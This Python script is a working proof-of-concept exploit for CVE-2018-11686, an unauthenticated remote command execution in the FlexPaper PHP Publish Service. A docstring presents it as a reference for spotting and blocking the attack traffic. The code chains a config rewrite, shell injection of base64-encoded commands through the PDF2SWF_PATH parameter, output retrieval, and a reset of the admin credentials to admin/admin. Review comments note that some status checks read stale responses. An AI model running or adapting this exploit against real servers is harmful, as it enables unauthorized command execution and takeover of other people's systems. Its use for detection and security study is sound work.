"""Proof-of-concept client for CVE-2018-11686 (FlexPaper PHP Publish Service, banner says <= 2.3.6).

Kept here as a reference for what the attack traffic looks like, so the
pattern can be recognised and blocked. Every request below is sent without
credentials, and each step leaves a distinct artefact in web-server access
logs: a GET to /php/change_config.php, a POST to the same path carrying
SAVE_CONFIG=1 and SWF_Directory=config/, a GET to /php/setup.php?step=4
whose PDF2SWF_PATH value contains shell metacharacters ('|', '>', an
encoded ';'), a GET for /php/config/output.txt, and a POST to setup.php
with ADMIN_USERNAME/ADMIN_PASSWORD set to "admin". File-integrity
monitoring on the FlexPaper config/ directory catches the written
output.txt; the fix is to upgrade beyond the affected release (or remove
the php/ publish service if it is not needed).
"""
import base64
import requests
import sys
import re  # not referenced anywhere below; harmless but unused

# Target and intercepting proxy are hard-coded. The proxy entry explains the
# proxies=proxy on every request; verify=False would only matter if remote
# were changed to an https URL.
remote = "http://127.0.0.1:8888"
ressource = "/flexpaper"
proxy = {
    'http': "http://127.0.0.1:8080"
}

if __name__ == "__main__":
    print("\nCVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6\n")

    # Step 0: fingerprint. A bare GET to change_config.php answering 302 is
    # taken as "the publish service is present"; anything else aborts.
    print("[+] Checking if ressource available =>", end=' ')
    burp0_url = remote + ressource + "/php/change_config.php"
    r = requests.get(burp0_url, proxies=proxy, verify=False, allow_redirects=False)
    if r.status_code == 302:
        print("\033[92mOK\033[0m")
    else:
        print("KO")
        sys.exit()

    # Interactive loop: one command per iteration. sys.exit() inside the
    # body raises SystemExit, which the KeyboardInterrupt handler does not
    # catch, so a failed step ends the program.
    while True:
        try:
            command = input("command (\033[92mreflected\033[0m)> ")
            if command == "exit":
                print("Exiting...")
                break

            # The command travels base64-encoded inside a query string; '/'
            # is swapped for '+' (the rest of the URL also uses '+' as the
            # space separator).
            command = base64.b64encode(command.encode('utf-8'))
            command_str = command.decode('utf-8')
            command_str = command_str.replace('/', '+')

            # Step 1: point SWF_Directory at config/ via the unauthenticated
            # save-config form. The POST is issued twice; only the second
            # (redirects followed) is checked, and it must land on
            # index.php?msg=Configuration%20saved!. burp0_headers is built
            # here but not passed to either post() call.
            print("[+] Cleaning config directory =>", end=' ')
            burp0_url = remote + ressource + "/php/change_config.php"
            burp0_headers = {
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
                "Accept-Encoding": "gzip, deflate",
                "Connection": "close",
                "Content-Type": "application/x-www-form-urlencoded"
            }
            burp0_data = {
                "SAVE_CONFIG": "1",
                "PDF_Directory": "a",
                "SWF_Directory": "config/",
                "LICENSEKEY": "a",
                "SPLITMODE": "a",
                "RenderingOrder_PRIM": "a",
                "RenderingOrder_SEC": "a"
            }
            r = requests.post(burp0_url, proxies=proxy, data=burp0_data, verify=False, allow_redirects=False)
            r = requests.post(burp0_url, proxies=proxy, data=burp0_data, verify=False)  # little hack
            if r.status_code == 200 and "index.php?msg=Configuration%20saved!" in r.url:
                print("\033[92mOK\033[0m")
            else:
                print("KO")
                sys.exit()

            # Step 2: the injection point. The PoC relies on setup.php (step 4)
            # handing PDF2SWF_PATH to a shell; the crafted value echoes the
            # base64 blob, decodes it, pipes it to sh and redirects output into
            # config/output.txt. This is the request a WAF or log rule should
            # key on: setup.php with pipe/redirect characters in PDF2SWF_PATH.
            print("[+] Executing command =>", end=' ')
            burp0_url = remote + ressource + \
                "/php/setup.php?step=4&PDF2SWF_PATH=echo+" + \
                command_str + "+|+base64+-d+|+sh+>config/output.txt%3b"
            burp0_headers = {
                "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
                "Accept-Encoding": "gzip, deflate",
                "Connection": "close"
            }
            # NOTE(review): the response is not assigned, so the check below
            # still looks at r from step 1, whose URL already contains
            # "index.php"; the "OK" here does not reflect this request.
            requests.get(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=True)
            if "index.php" in r.url:
                print("\033[92mOK\033[0m")
            else:
                print("KO")
                sys.exit()

            # Step 3: read back config/output.txt over HTTP. A 200 here means
            # the written file is web-reachable; its body is printed verbatim.
            print("[+] Getting result =>", end=' ')
            burp0_url = remote + ressource + "/php/config/output.txt"
            burp0_headers = {
                "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
                "Accept-Encoding": "gzip, deflate",
                "Connection": "close"
            }
            r = requests.get(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=False)
            if r.status_code == 200:
                print("\033[92mOK\033[0m")
                print(r.text)
            else:
                print("KO")
                sys.exit()

            # Step 4: re-run setup step 4 with admin/admin to put the
            # configuration back. As in step 2, the response is discarded and
            # the status check below re-reads r from step 3.
            print("[+] Reset config of FlexPaper =>", end=' ')
            burp0_url = remote + ressource + \
                "/php/setup.php?step=4"
            burp0_headers = {
                "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3",
                "Accept-Encoding": "gzip, deflate",
                "Connection": "close",
                "Content-Type": "application/x-www-form-urlencoded"
            }
            burp0_data = {"ADMIN_USERNAME": "admin", "ADMIN_PASSWORD": "admin"}
            requests.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy, verify=False, allow_redirects=True)
            if r.status_code == 200:
                print("\033[92mOK\033[0m")
            else:
                print("KO")
                sys.exit()
        except KeyboardInterrupt:
            print("Exiting...")
            break